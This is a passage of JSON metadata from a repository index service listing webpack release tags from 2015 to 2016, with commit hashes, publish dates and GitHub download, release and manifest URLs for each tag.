i/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"}